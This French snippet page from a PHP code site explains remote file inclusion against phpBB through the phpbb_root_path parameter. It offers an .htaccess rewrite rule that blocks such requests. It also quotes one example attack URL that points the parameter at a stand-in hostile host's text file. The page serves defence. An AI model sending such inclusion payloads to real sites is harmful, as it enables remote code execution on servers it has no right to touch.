Sécurisation de votre site avec phpbb (phpbb_root_path)

  Information

Les sites à base de CMS et de composant disponibles gratuitement sur internet sont sensibles aux attaques et aux vulnérabilités par inclusion de fichier distant (RFI).

En effet leur code est connu de tous et analysé par les hackers pour détecter des failles.

Celle-ci touche comme souvent les script contenant des chemin d'includes préfixés par une variable. En effet si le site à le paramètre register_globals à on, un paramètre GET peut alimenter facilement cette variable.

Dans cet exemple avec un forum phpbb les urls sont de la forme : http://www.example.com/?phpbb_root_path=http://sitepourri.com/page.txt???

  code source classé dans  .HTACCESS ANTI HACK

 
 01    
 02    
 03    
 04    
 05    
 06    
 07    
 08    
 09    
 10    
 11    
 12    
 13    
 14    
 15    
 16    
 17    
 
                               

                            
/*
    Titre : Sécurisation de votre site avec phpbb (phpbb_root_path)                                                    
                                                                                                                          
    URL   : https://phpsources.net/code_s.php?id=781
    Auteur           : Forty                                                                                              
    Website auteur   : http://www.toplien.fr/                                                                             
    Date édition     : 09 Juin 2008                                                                                      
    Date mise a jour : 18 Aout 2019
                                                                                      
    Rapport de la maj:                                                                                                    
    - fonctionnement du code vérifié                                                                                
*/
/*---------------------------------------------------------------*/?>
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*&)?phpbb_root_path=http://
RewriteRule ^.*$ - [F,L]

   Un petit merci aux auteurs pour leur travail, ça ne coûte rien et ça fait toujours plaisir wink

 Autres snippets qui pourraient vous intéressez

18 Sept 2019  

09 Juin 2008 

Afficher la liste des connectés sur votre site

Compatibilité : PHP 5, PHP 7, PHP 8

Affiche la liste des connectés sur le site en stockant l'ip du visiteur, son pseudo et sa date de dernière visite dans une table. Script complet.

21 Jan 2026  

09 Juin 2008 

Afficher la citation du jour sur votre site

Compatibilité : PHP 5, PHP 7, PHP 8

Afficher sur votre site internet une citation différente chaque jour de l'année. Mettre 1 seule citation par ligne.

19 Aout 2019  

09 Juin 2008 

Protéger vos adresses email sur votre site

Compatibilité : PHP 5, PHP 7, PHP 8

Retourne du JS qui permet de placer des adresses email en clair sur une site sans que celle ci soit visible dans le code.

29 Aout 2019  

09 Juin 2008 

Sécurisation des chaines de caractères

Compatibilité : PHP 5, PHP 7, PHP 8

2 fonctions permettant de sécurité les variables contre les injections SQL et XSS avant export SQL.

01 Oct 2019  

09 Juin 2008 

Redirection PHP ancien site vers nouveau site

Compatibilité : PHP 5, PHP 7, PHP 8

Il arrive que l'on doive faire une redirection définitive d'un ancien site vers un nouveau. Il faut alors mettre en place une redirection 301 sur chaque page.

* Requêtes exécutées avec Recherche Contextuelle
avatar

Forty

  09 Juin 2008

  SOURCE   Télécharger

Information sur les mises à jour

Dernière mise à jour :

    18 Aout 2019
    fonctionnement du code vérifié

16 912 Vues
Compatibilité du code
PHP 5, 7 et 8+
avatar
Site internet  
26 codes

Catégorie :  .HTACCESS ANTI HACK

Bloquer l'accès au site pour le navigateur libwww-perl
Bloquer le hacking avec le script errors.php
Bloquer les hackers utilisant le script booth.php
Bloquer les proxy appspot.com
Bloquer les requetes de hacker avec %3Cstring%3E
Corriger la faille touchant mambo via image_upload.php
Empêcher le hack via aedatingCMS.php
Empêcher le hack via gestion_sondage.php
Empêcher le hack via mosConfig_absolute_path
Empêcher le hack via sitemap.php
Empeche le hack via wamp_dir/setup/yesno.phtml
Empecher le hack via admin.php
Empecher le hack via admin_smilies.php
Empecher le hack via bbs.lib.inc.php
Empecher le hack via setup/header.php
Empecher les attaques par include de fichier externe
Eviter la faille de sécurité de Joomla (mosDirectory)
Eviter les attaques par le script send_reminders.php
Inclusion de fichiers distants avec un script de HITWEB
Protection contre la faille de sécurité de info.inc.php
Protection contre la faille de sécurité de stats.inc.php
Protection contre le hack avec 404.php
Sécurisation de votre site avec phpbb (phpbb_root_path)
Se protéger du hacking avec admin.php et include_path
Vulnérabilité par inclusion de fichier distant avec smarty.php
Vulnérabilité touchant webcalendar via tools/send_reminders.php

Catégories générales

Applications  [ 11 ]
Banque de données  [ 18 ]
Chaines de caractères  [ 57 ]
Classes  [ 20 ]
Constantes  [ 4 ]
Convertisseurs  [ 12 ]
Cookies  [ 3 ]
Dates - Heures  [ 52 ]
Divers  [ 19 ]
Mail - Emailing  [ 14 ]
Fichiers-répertoires  [ 52 ]
Fonctions  [ 13 ]
Formulaires  [ 13 ]
FTP  [ 16 ]
.HTACCESS  [ 58 ]
.HTACCESS ANTI HACK  [ 26 ]
HTML  [ 14 ]
Images - Graphisme  [ 54 ]
Jeux  [ 3 ]
Mathématiques  [ 46 ]
MySQL  [ 23 ]
MySQLi  [ 19 ]
Navigateurs  [ 5 ]
Page par Page - Pagination  [ 5 ]
Prestashop  [ 4 ]
Recherches  [ 6 ]
Regex  [ 14 ]
Sécurité  [ 24 ]
SEO - Référencement  [ 13 ]
Sessions  [ 7 ]
SQL Tricks  [ 5 ]
Statistiques  [ 7 ]
Système  [ 12 ]
Tableaux - Array  [ 34 ]
Tag Cloud  [ 4 ]
URL - Liens  [ 25 ]
Variables  [ 9 ]
Vérificateurs  [ 8 ]
Wordpress  [ 8 ]
[ 4 ]
XML  [ 4 ]